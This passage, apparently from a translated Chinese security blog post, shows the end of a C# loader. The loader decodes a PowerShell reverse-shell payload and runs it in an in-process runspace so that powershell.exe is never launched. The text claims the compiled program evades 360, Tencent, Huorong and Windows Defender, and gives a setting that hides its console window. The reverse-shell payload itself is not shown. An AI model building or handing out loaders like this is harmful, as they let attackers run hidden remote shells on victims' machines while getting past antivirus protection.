            string decodedString = Encoding.UTF8.GetString(psrevshell);
            // Host the PowerShell engine in-process instead of launching powershell.exe
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            Pipeline pipeline = rs.CreatePipeline();
            pipeline.Commands.AddScript(decodedString);
            pipeline.Invoke();
            rs.Close();
        }
    }
}
```


After compiling, it passes both dynamic and static scanning by 360, Tencent and Huorong, but a black console window appears when it runs; change the project settings (Properties -> Output type -> Windows Application) to get rid of it.

This also bypasses Windows Defender.


References

Thanks to Green (格林大佬) for providing the articles and projects to learn from, Orz !!!

https://github.com/INotGreen/nopowershell

https://blog.csdn.net/Hungchuiho/article/details/121436429

https://mamor5409.github.io/posts/359bf983/

https://mp.weixin.qq.com/s/znyLqniUX_WXRizGV6TQlA
